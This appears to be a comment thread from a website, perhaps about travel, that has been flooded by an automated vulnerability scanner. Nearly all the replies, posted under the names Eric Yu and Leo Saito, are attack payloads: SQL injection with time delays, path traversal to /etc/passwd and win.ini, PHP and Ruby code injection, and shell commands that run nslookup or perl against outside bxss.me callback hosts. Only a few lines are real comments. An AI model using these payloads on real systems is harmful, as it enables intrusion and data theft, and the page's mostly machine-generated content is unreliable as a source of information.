\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
${9999279+10000318}
re: Eric Yu
)
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
'.gethostbyname(lc('hitrs'.'xjvklzyc4e015.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(71).chr(119).chr(79).'
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
".gethostbyname(lc("hitcd"."xipuhudyf2bd9.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(79).chr(120).chr(82)."
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
/etc/shells
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
bxss.me
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(111).concat(70).concat(97).concat(76)+(require"socket"
Socket.gethostbyname("hitqm"+"qfzuecklf6ec0.bxss.me.")[3].to_s)+"
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(122).concat(88).concat(98).concat(77)+(require'socket'
Socket.gethostbyname('hityh'+'gbrxruqh3fa6b.bxss.me.')[3].to_s)+'
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
'"
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
<!--
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+685-685-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+685-685-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+197-197-1=0+0+0+1
re: Eric Yu
-1 OR 3+197-197-1=0+0+0+1
re: Eric Yu
-1' OR 2+401-401-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+401-401-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+426-426-1=0+0+0+1 or 'QgrH02na'='
re: Eric Yu
-1' OR 3+426-426-1=0+0+0+1 or 'QgrH02na'='
re: Eric Yu
-1" OR 2+599-599-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+599-599-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
t3jmjQQp'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 307=(SELECT 307 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 308=(SELECT 308 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 299=(SELECT 299 FROM PG_SLEEP(15))--
re: Eric Yu
9ZQz1qaR' OR 769=(SELECT 769 FROM PG_SLEEP(15))--
re: Eric Yu
I7svo4cL') OR 221=(SELECT 221 FROM PG_SLEEP(15))--
re: Eric Yu
9MwFPJMs')) OR 199=(SELECT 199 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@YrHJ5
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
1
It would be below ponta and above hassegawa.
re: Leo Saito
BpNhVj0p
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+568-568-1=0+0+0+1
re: Leo Saito
-1 OR 3+568-568-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
0LEXKDju'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 828=(SELECT 828 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
re: Leo Saito
ZfzMlgII' OR 654=(SELECT 654 FROM PG_SLEEP(15))--
re: Leo Saito
jKUkM6XZ') OR 144=(SELECT 144 FROM PG_SLEEP(15))--
re: Leo Saito
NG359xH1')) OR 76=(SELECT 76 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@4LpX5
re: Leo Saito
4MJZUxfr
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+37-37-1=0+0+0+1
re: Leo Saito
-1 OR 3+37-37-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
Dqy5CxKo'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 714=(SELECT 714 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 758=(SELECT 758 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 580=(SELECT 580 FROM PG_SLEEP(15))--
re: Leo Saito
UFdPXMnl' OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: Leo Saito
jArFRfOA') OR 120=(SELECT 120 FROM PG_SLEEP(15))--
re: Leo Saito
SUjRuMei')) OR 693=(SELECT 693 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@XVHbc
re: Leo Saito
1D9NQFBrO
re: Leo Saito
response.write(9467261*9444382)
re: Leo Saito
'+response.write(9467261*9444382)+'
re: Leo Saito
"+response.write(9467261*9444382)+"
re: Leo Saito
%0abcc:074625.67-10194.67.3b188.19990.2@bxss.me
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-10195.67.3b188.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
${9999560+9999145}
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
echo jpfrtn$()\ kucwps\nz^xyu||a #' &echo jpfrtn$()\ kucwps\nz^xyu||a #|" &echo jpfrtn$()\ kucwps\nz^xyu||a #
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
&echo sllemf$()\ mnocsp\nz^xyu||a #' &echo sllemf$()\ mnocsp\nz^xyu||a #|" &echo sllemf$()\ mnocsp\nz^xyu||a #
re: Leo Saito
/etc/passwd
re: Leo Saito
|echo atbfmz$()\ znckaq\nz^xyu||a #' |echo atbfmz$()\ znckaq\nz^xyu||a #|" |echo atbfmz$()\ znckaq\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
(nslookup hitlfofsoecjlbe87d.bxss.me||perl -e "gethostbyname('hitlfofsoecjlbe87d.bxss.me')")
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
)
re: Leo Saito
$(nslookup hitileyminfng43532.bxss.me||perl -e "gethostbyname('hitileyminfng43532.bxss.me')")
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
&nslookup hityqmsktcvve46cef.bxss.me&'\"`0&nslookup hityqmsktcvve46cef.bxss.me&`'
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
&(nslookup hitygsizoeunl5eb9a.bxss.me||perl -e "gethostbyname('hitygsizoeunl5eb9a.bxss.me')")&'\"`0&(nslookup hitygsizoeunl5eb9a.bxss.me||perl -e "gethostbyname('hitygsizoeunl5eb9a.bxss.me')")&`'
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
|(nslookup hitoabvdjwmbe35532.bxss.me||perl -e "gethostbyname('hitoabvdjwmbe35532.bxss.me')")
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
`(nslookup hitccmuyrixcra182a.bxss.me||perl -e "gethostbyname('hitccmuyrixcra182a.bxss.me')")`
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
;(nslookup hitbidpdmzuam6ae03.bxss.me||perl -e "gethostbyname('hitbidpdmzuam6ae03.bxss.me')")|(nslookup hitbidpdmzuam6ae03.bxss.me||perl -e "gethostbyname('hitbidpdmzuam6ae03.bxss.me')")&(nslookup hitbidpdmzuam6ae03.bxss.me||perl -e "gethostbyname('hitbidpdmzuam6ae03.bxss.me')")
re: Leo Saito
file:///etc/passwd
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
'.gethostbyname(lc('hitbn'.'ogfxkcgu16f28.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(86).chr(109).chr(73).'
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
".gethostbyname(lc("hitai"."ixuhgqnsb9e99.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(71).chr(112).chr(69)."
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
/etc/shells
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
bxss.me
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(99).concat(76).concat(119).concat(74)+(require"socket"
Socket.gethostbyname("hitkn"+"bhwplfsqb4d27.bxss.me.")[3].to_s)+"
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(97).concat(74).concat(105).concat(66)+(require'socket'
Socket.gethostbyname('hitvs'+'cqgbqung4e161.bxss.me.')[3].to_s)+'
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
'"
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
<!--
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+556-556-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+556-556-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+81-81-1=0+0+0+1
re: Leo Saito
-1 OR 3+81-81-1=0+0+0+1
re: Leo Saito
-1' OR 2+950-950-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+950-950-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+920-920-1=0+0+0+1 or 'ByC7iAOd'='
re: Leo Saito
-1' OR 3+920-920-1=0+0+0+1 or 'ByC7iAOd'='
re: Leo Saito
-1" OR 2+13-13-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+13-13-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
mlZLs2DC'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 240=(SELECT 240 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 890=(SELECT 890 FROM PG_SLEEP(15))--
re: Leo Saito
2gWGfQ4Q' OR 714=(SELECT 714 FROM PG_SLEEP(15))--
re: Leo Saito
yMieA169') OR 813=(SELECT 813 FROM PG_SLEEP(15))--
re: Leo Saito
8vhVblOH')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@iLjL1
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
1
Thank you. I will try them out on my lastest trip!
re: Eric Yu
5XLmagFH
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+727-727-1=0+0+0+1
re: Eric Yu
-1 OR 3+727-727-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
HFrGGLy4'; waitfor delay '0:0:15' --
